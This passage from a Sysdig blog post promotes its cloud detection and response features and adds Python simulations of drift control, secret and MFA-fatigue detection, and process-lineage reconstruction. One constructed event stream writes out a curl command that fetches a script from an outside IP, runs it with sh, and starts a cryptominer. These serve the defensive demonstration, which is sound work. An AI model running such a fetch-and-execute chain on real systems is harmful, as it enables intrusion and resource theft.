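        if e.get("event") == "repository" and e.get("action") == "publicized":
            findings.append(_finding("github", "Private repository made public", actor, repo, None))
        elif e.get("event") == "push":
            for c in e.get("commits", []):
                for name, pat in SECRET_PATTERNS.items():
                    if pat.search(c.get("patch", "")):
                        findings.append(_finding("github", "Secret pushed to repository", actor,
                                                 f"{name} in {repo}@{c['id'][:7]}", None))
    return findings

def run_all():
    """Correlate all three sources into one ordered finding list."""
    return (detect_cloudtrail(CLOUDTRAIL_EVENTS) + detect_mfa_fatigue(OKTA_EVENTS)
            + detect_github(GITHUB_EVENTS))

if __name__ == "__main__":
    for f in run_all():
        print(f"[{f['source']}] {f['rule']}: {f['actor']} ({f['detail']})")
```

Running the script prints four findings: the StopLogging call, an MFA fatigue alert for alice (bob's single denial stays below the threshold), the repository made public, and the AWS key in the pushed diff. The MFA rule is stateful (a sliding window per user), which is why log-based detection needs a stream processor rather than a per-event filter; the secret patterns are deliberately narrow to keep false positives down and should be extended with the credential formats your organization actually issues.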

Enhanced drift control

Sysdig’s Drift Control dynamically blocks executables that were added or modified after a container is deployed into production. By blocking container drift, you can prevent many common runtime attacks that drop scripts or malware with embedded executables into a running container, because the binary the attacker needs was never part of the image. Drift Control is a simple runtime security policy that can be quickly applied to the entire environment.
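To make the drift policy concrete, here is an added simulation written for this page; it is not Sysdig's Drift Control implementation. Falco detects drift at runtime from the container's filesystem layers (its `proc.is_exe_upper_layer` field is true when the executable lives in the writable upper layer rather than the image), whereas the example below compares each exec against a constructed baseline of path to SHA-256 so it can run offline. The image contents, exec events and hashes are all constructed.

```python
"""Added example (not Sysdig's Drift Control code): a simulation of the drift
policy, deciding for each exec in a container whether the executable shipped in
the image. The baseline is a constructed dict of path -> SHA-256; a real agent
checks the filesystem layers instead. All paths and events are constructed."""
import hashlib

def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Constructed image contents: what the build produced, recorded before deployment.
IMAGE_FILES = {
    "/usr/bin/python3": b"ELF python3 build 3.11.4",
    "/usr/bin/curl":    b"ELF curl build 8.1.2",
    "/app/server.py":   b"import http.server",
}
IMAGE_BASELINE = {path: sha256(blob) for path, blob in IMAGE_FILES.items()}

# Constructed runtime exec events: path plus the bytes actually on disk at exec time.
EXEC_EVENTS = [
    {"pid": 1,  "path": "/usr/bin/python3", "data": IMAGE_FILES["/usr/bin/python3"]},
    {"pid": 41, "path": "/usr/bin/curl",    "data": IMAGE_FILES["/usr/bin/curl"]},
    {"pid": 42, "path": "/tmp/xmrig",       "data": b"ELF xmrig 6.20.0"},      # dropped after start
    {"pid": 43, "path": "/usr/bin/python3", "data": b"ELF trojaned python3"},  # overwritten in place
]

def drift_verdict(baseline, event):
    """Classify one exec: 'allowed', 'added' (not in image) or 'modified' (hash differs)."""
    expected = baseline.get(event["path"])
    if expected is None:
        return "added"
    if sha256(event["data"]) != expected:
        return "modified"
    return "allowed"

def enforce(baseline, events, mode="block", exceptions=()):
    """Apply the policy to a stream of execs.

    mode='block' denies drifted execs; mode='alert' lets them run but still reports
    them (the usual first step when rolling the policy out). `exceptions` lists path
    prefixes allowed to change at runtime; keep it narrow, since a broad prefix such
    as '/tmp/' reopens exactly the hole the policy closes."""
    results = []
    for ev in events:
        verdict = drift_verdict(baseline, ev)
        if verdict != "allowed" and any(ev["path"].startswith(p) for p in exceptions):
            verdict = "allowed"
        action = "deny" if (verdict != "allowed" and mode == "block") else "run"
        results.append({"pid": ev["pid"], "path": ev["path"], "drift": verdict, "action": action})
    return results

if __name__ == "__main__":
    for r in enforce(IMAGE_BASELINE, EXEC_EVENTS):
        print(f"pid {r['pid']:>3} {r['path']:<18} {r['drift']:<9} -> {r['action']}")
```

The two execs that match the image run; the miner dropped into `/tmp` is denied as "added", and the overwritten interpreter is denied as "modified" even though its path is legitimate. That second case is why a path allow-list alone is not drift control: the check has to bind the executable's identity to the image, not just its name.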

Speeding up incident response with live threat investigation

Sysdig CDR also offers advanced incident response capabilities that empower you to investigate and respond at cloud speed. The longer a malicious actor maintains access to your environment, the greater the potential for extensive damage. Furthermore, the cost associated with a data breach escalates as time elapses without proper response. Immediate response is crucial, but without proper context, understanding the threat and reacting swiftly becomes a challenge. With Sysdig CDR, you gain the insights necessary to take rapid and informed action.

Live mapping

Kubernetes Live brings an EDR-like approach of assembling all relevant real-time events into one view when a breach occurs. This gives teams a dynamic view of their live infrastructure and workloads, as well as the relationships between them. Equipped with an understanding of all the vulnerable workloads, critical security events, and triggered runtime policies in your Kubernetes environment, you can speed incident response with enriched context. Learn more about Kubernetes Live in this blog.

Attack lineage with context

Sysdig Process Tree unveils the attack journey from user to process. This includes the process lineage to show how a process was initiated, as well as key context like container and host information, malicious user details, and impact. With a full understanding of the relationships and dependencies between processes, you can identify which processes are malicious and act on them quickly. Learn more about Process Tree in this blog.
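Reconstructing that lineage is a matter of following parent-process links in the exec events a runtime agent records. The following is an added illustration written for this page, not Sysdig's Process Tree implementation: it walks the pid/ppid chain from an alerted process back to the container's init, renders it, and picks out the pivot where a non-shell parent first spawned a shell, which is usually the initial compromise. The exec stream is constructed to show a web application spawning a shell that fetches and runs a miner; the field set on each event is an assumption about what the agent captures.

```python
"""Added example (not Sysdig's Process Tree implementation): reconstruct attack
lineage from constructed process-exec events. Each event carries pid, ppid, the
command, the user and the container, as a runtime agent would capture them."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Exec:
    pid: int
    ppid: int
    comm: str
    cmdline: str
    user: str
    container: str

# Constructed exec stream for one container: app -> shell -> download -> miner.
EXECS = [
    Exec(1,   0,   "python3", "python3 app.py",                   "app", "web-7c9f"),
    Exec(200, 1,   "sh",      "sh -c id",                         "app", "web-7c9f"),
    Exec(201, 200, "curl",    "curl -s http://198.51.100.9/x.sh", "app", "web-7c9f"),
    Exec(202, 200, "sh",      "sh /tmp/x.sh",                     "app", "web-7c9f"),
    Exec(203, 202, "xmrig",   "/tmp/xmrig -o pool:3333",          "app", "web-7c9f"),
]

SHELLS = {"sh", "bash", "dash", "zsh"}

def lineage(execs, pid):
    """Walk ppid links from `pid` up to the container's init; returns a root-first list."""
    by_pid = {e.pid: e for e in execs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                 # guard against cyclic or garbled ppid data
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return list(reversed(chain))

def render(chain):
    return " -> ".join(f"{e.comm}({e.pid})" for e in chain)

def pivot_point(chain):
    """First link where a non-shell parent spawned a shell: the likely initial
    compromise (e.g. a web app executing attacker-controlled input)."""
    for parent, child in zip(chain, chain[1:]):
        if child.comm in SHELLS and parent.comm not in SHELLS:
            return child
    return None

def investigate(execs, alert_pid):
    """Summarize what a responder needs: where it ran, as whom, how it got there."""
    chain = lineage(execs, alert_pid)
    pivot = pivot_point(chain)
    return {
        "container": chain[-1].container,
        "user": chain[-1].user,
        "lineage": render(chain),
        "entry": pivot.cmdline if pivot else None,
        "entry_parent": chain[chain.index(pivot) - 1].comm if pivot else None,
    }

if __name__ == "__main__":
    print(investigate(EXECS, 203))
```

For the miner (pid 203) the summary reads `python3(1) -> sh(200) -> sh(202) -> xmrig(203)`, with the entry point identified as `sh -c id` spawned by `python3`. That is the fact a responder acts on: the application itself executed a shell, so the fix is in the app (or its exposed input), not only in killing the miner.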

Curated threat dashboards

Sysdig’s threat dashboards spotlight events across clouds, containers, Kubernetes, and hosts, acting as a centralized view of critical security issues. Sysdig also provides dynamic mapping against the MITRE ATT&CK framework for cloud-native environments. Security teams can use this information to understand the full landscape of threats in their environment and prioritize response.

Key Benefits of Sysdig CDR

  • Stop cloud breaches with real-time, end-to-end threat detection powered by Falco: Consolidate security with an approach combining Drift Control, Machine Learning, and Falco detections, all curated by Sysdig Threat Research.
  • Accelerate cloud threat investigation and incident response in real time: Surface the context you need to understand the possible impact and respond quickly.

Sysdig is the first vendor to deliver the consolidation of CDR and CNAPP, leveraging the power of open source Falco in both agent and agentless deployment models. With Sysdig CDR, you can prevent advanced attacks and contain threats in real time across the cloud fabric.

If you want to learn more, sign up for one of our upcoming webinars or get a demo today.

The post Stop Cloud Breaches in Real Time and Accelerate Investigation and Response with Sysdig CDR appeared first on Sysdig.

]]>